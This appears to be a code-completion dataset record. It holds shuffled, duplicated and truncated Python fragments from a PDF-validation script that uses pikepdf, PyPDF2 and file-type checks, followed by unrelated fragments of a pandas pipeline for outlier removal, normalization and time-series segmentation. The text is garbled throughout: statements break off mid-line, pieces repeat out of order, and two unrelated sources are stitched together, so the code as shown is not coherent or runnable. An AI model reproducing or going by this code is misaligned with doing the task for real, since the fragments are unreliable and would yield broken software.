pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <=", "# output = magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in output: # return", "return [isOK, checkData] # if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header =", "#print(header.decode('iso-8859-1')) # for name, value in headers.items(): # print('%s: %s' % (name, value))", "meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages)", "= pdfFile.open_metadata() #status = meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta,", "isOK[1])) return [isOK, checkData] # if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header", "1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value in", "''] checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta", "not in output: # return False # except Exception as e: # return", "[check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except Exception", "#print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) # try: # output = magic.from_file(filePath, mime=True).lower()", "Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges:", "# excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # 
\"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") #", "isOK[0] = 'YES' try: with open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if", "= ['', ''] checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile =", "magic.from_file(filePath, mime=True) # try: # output = magic.from_file(filePath, mime=True).lower() # if \"pdf\" not", "= \"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK = ['', ''] checkData =", "False # except Exception as e: # return False # else: # return", "as e: isOK = \"False\" else: isOK = \"True\" return [isOK, checkData] def", "except Exception as e: isOK[1] = 'NO' else: isOK[1] = 'YES' #print('%s:\\n %s", "'__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021", "def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) # try: # output =", "# if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate:", "nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n'", "pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\" except Exception as", "pikepdf import PyPDF2 # excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile(", "isOK[1] = 'YES' #print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1])) #print('%s %s' %", "close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; 
preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' #", "%s' % (fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return [isOK, checkData]", "except Exception as e: isOK[0] = 'NO' else: isOK[0] = 'YES' try: with", "pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0:", "False # else: # return True def validatePDF_test2(fileName): isOK = \"\" checkData =", "isOK = \"False\" else: isOK = \"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK", "downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def validatePDF(filePath): #print('validatePDF: ', filePath)", "try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData = pdfFile.check()", "%s' % (isOK[0], isOK[1])) return [isOK, checkData] # if __name__ == '__main__': #", "= pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData", "pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\" except Exception as e:", "% (fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return [isOK, checkData] #", "= 'NO' else: isOK[1] = 'YES' #print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1]))", "#header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon,", "#checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status) except Exception", "12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 
Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type:", "pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK =", "\"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK = ['', ''] checkData = []", "e: # return False # else: # return True def validatePDF_test2(fileName): isOK =", "<= 0: raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK[0] = 'NO' else:", "= \"False\" else: isOK = \"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK =", "filePath) return magic.from_file(filePath, mime=True) # try: # output = magic.from_file(filePath, mime=True).lower() # if", "[isOK, checkData] def validatePDF_test1(fileName): isOK = ['', ''] checkData = [] filePath =", "OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02", "GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security:", "return False # except Exception as e: # return False # else: #", "max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) #", "\"\" checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta", "info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def validatePDF(filePath): #print('validatePDF:", "[info] def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) # try: # output", "isOK[1] = 'NO' else: isOK[1] = 'YES' #print('%s:\\n %s 
%s' % (fileName, isOK[0],", "2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1;", "# try: # output = magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in output:", "\"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath,", "Exception as e: isOK[1] = 'NO' else: isOK[1] = 'YES' #print('%s:\\n %s %s'", "as e: isOK[1] = 'NO' else: isOK[1] = 'YES' #print('%s:\\n %s %s' %", "validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) # try: # output = magic.from_file(filePath,", "#checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status) except", "except Exception as e: isOK = \"False\" else: isOK = \"True\" return [isOK,", "except Exception as e: # return False # else: # return True def", "# \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def validatePDF(filePath): #print('validatePDF: ', filePath) return", "isOK = \"\" checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile =", "with open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise", "e: isOK[1] = 'NO' else: isOK[1] = 'YES' #print('%s:\\n %s %s' % (fileName,", "08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; 
preload;\\r\\nX-Frame-Options:", "<= 0: # raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK = \"False\"", "pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise", "'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\" except", "raise \"k\" except Exception as e: isOK[1] = 'NO' else: isOK[1] = 'YES'", "as e: isOK[0] = 'NO' else: isOK[0] = 'YES' try: with open(filePath, 'rb')", "# info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def validatePDF(filePath):", "Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains;", "output: # return False # except Exception as e: # return False #", "= b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08", "# return False # else: # return True def validatePDF_test2(fileName): isOK = \"\"", "#status = meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status] #print(pdfFile.pages)", "b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan", "def validatePDF_test2(fileName): isOK = \"\" checkData = [] filePath = os.path.join(downloadDir, fileName) try:", "as e: # return False # else: # return True def validatePDF_test2(fileName): isOK", "= os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check())", "= meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = 
[check, meta, status] #print(pdfFile.pages) if", "# raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK = \"False\" else: isOK", "Exception as e: isOK = \"False\" else: isOK = \"True\" return [isOK, checkData]", "filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool'])", "mime=True) # try: # output = magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in", "import pikepdf import PyPDF2 # excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info =", "% (isOK[0], isOK[1])) return [isOK, checkData] # if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf')", "[isOK, checkData] # if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1", "downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer:", "path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value in headers.items(): # print('%s:", "return False # else: # return True def validatePDF_test2(fileName): isOK = \"\" checkData", "PyPDF2 # excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\")", "checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\"", "= [info] def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) # try: #", "True def validatePDF_test2(fileName): isOK = \"\" checkData = [] filePath = 
os.path.join(downloadDir, fileName)", "else: isOK[0] = 'YES' try: with open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj)", "dlReports = [info] def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) # try:", "%s %s' % (fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return [isOK,", "#checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status) except Exception as", "excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # #", "if \"pdf\" not in output: # return False # except Exception as e:", "as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\" except Exception", "= PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\" except Exception as e: isOK[1]", "checkData] def validatePDF_test1(fileName): isOK = ['', ''] checkData = [] filePath = os.path.join(downloadDir,", "#print(pdfFile.pages) #if pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status) except Exception as e:", "includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for", "# print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info]", "# except Exception as e: # return False # else: # return True", "= getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports", "pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) 
#checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: # raise \"k\"", "isOK = ['', ''] checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile", "#print(meta.pdfa_status) except Exception as e: isOK = \"False\" else: isOK = \"True\" return", "else: isOK = \"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK = ['', '']", "(isOK[0], isOK[1])) return [isOK, checkData] # if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') #", "def validatePDF_test1(fileName): isOK = ['', ''] checkData = [] filePath = os.path.join(downloadDir, fileName)", "# #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified:", "open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\"", "= [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except", "len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK[0] = 'NO'", "if pdfReader.numPages <= 0: raise \"k\" except Exception as e: isOK[1] = 'NO'", "isOK = \"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK = ['', ''] checkData", "pdfReader.numPages <= 0: raise \"k\" except Exception as e: isOK[1] = 'NO' else:", "pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData =", "= \"\" checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath)", "pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages))", "try: with open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if 
pdfReader.numPages <= 0:", "= downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def validatePDF(filePath): #print('validatePDF: ',", "<filename>app/imr/scrapyard.py import pikepdf import PyPDF2 # excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info", "#meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check,", "HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value in headers.items(): #", "# #print(header.decode('iso-8859-1')) # for name, value in headers.items(): # print('%s: %s' % (name,", "<= 0: raise \"k\" except Exception as e: isOK[1] = 'NO' else: isOK[1]", "#print('%s %s' % (isOK[0], isOK[1])) return [isOK, checkData] # if __name__ == '__main__':", "['', ''] checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath)", "try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if", "'YES' try: with open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <=", "28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length:", "', filePath) return magic.from_file(filePath, mime=True) # try: # output = magic.from_file(filePath, mime=True).lower() #", "\"pdf\" not in output: # return False # except Exception as e: #", "[] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status)", "\"k\" #print(meta.pdfa_status) except Exception as e: isOK = \"False\" else: isOK = \"True\"", "= 
'YES' try: with open(filePath, 'rb') as pdfFileObj: pdfReader = PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages", "#print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return", "#meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: #", "checkData] # if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200", "5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly;", "Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value in headers.items(): # print('%s: %s' %", "= 'NO' else: isOK[0] = 'YES' try: with open(filePath, 'rb') as pdfFileObj: pdfReader", "mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value in headers.items():", "HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value in headers.items(): # print('%s: %s'", "import PyPDF2 # excelFileList = getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( #", "= pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0:", "os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData", "if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK[0] =", "'NO' else: isOK[0] = 
'YES' try: with open(filePath, 'rb') as pdfFileObj: pdfReader =", "fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status #checkData =", "# else: # return True def validatePDF_test2(fileName): isOK = \"\" checkData = []", "checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta =", "output = magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in output: # return False", "#print(meta.pdfa_status) except Exception as e: isOK[0] = 'NO' else: isOK[0] = 'YES' try:", "\"k\" except Exception as e: isOK[1] = 'NO' else: isOK[1] = 'YES' #print('%s:\\n", "status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except Exception as e:", "= os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status = meta.pdfa_status", "pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages", "#print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK[0]", "raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK[0] = 'NO' else: isOK[0] =", "2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection:", "SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name, value", "bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; 
preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/;", "#checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status)", "meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status) except Exception as", "return True def validatePDF_test2(fileName): isOK = \"\" checkData = [] filePath = os.path.join(downloadDir,", "'YES' #print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1]))" ]
[ "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in", ":param data_segments: :param selected_columns: :param axis: :return: \"\"\" try: data = None for", "mode is None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None, threshold = None): \"\"\" Removes", "of a data set. :param current_representation: :param target_representation: :param data: :return: \"\"\" raise", "data = (data - data.min()) / (data.max() - data.min()) # to center around", "= data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)):", "DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides import traceback import os", "= pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError,", "data is None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame):", "= encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "selected_data_segments: data_segments.append(segment) return data_segments if mode == 'fixed_interval': segment_length = args[0] aggregate =", "(data[columns] - data[columns].mean()) / 
data[columns].std() else: mean = data.mean() std = data.std() data", "# 2. Split by non-subsequent indices # Source for next 3 lines after", "None for ind in range(len(data_segments)): if data is None: data = data_segments[ind][selected_columns] else:", "quantile=0.99 # current run @0.95 for classical approach via TS Fresh )[:-2] data_train", "data set. :param current_representation: :param target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides", "< 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source for next 7", "self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data(", "= data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index data = data.reset_index(drop=False)", "@overrides def segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements a time series based", "columns = None, mean = None, std = None): \"\"\" Apply z-normalization to", "data_segments = [] for target_label in args: selected_data = data[data[label_column] == target_label] #", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self,", "unit='ms') data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq)", "via TS Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test =", "data[columns] = (data[columns] - mean) / std else: data = (data - 
mean)", "@overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns = None): \"\"\" Apply", "column in columns: not_outliers = data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] =", "data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return data if mode ==", "road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_train_segments.append(road_segment) #Segment", "columns: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "= self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality(", "if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "#data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable 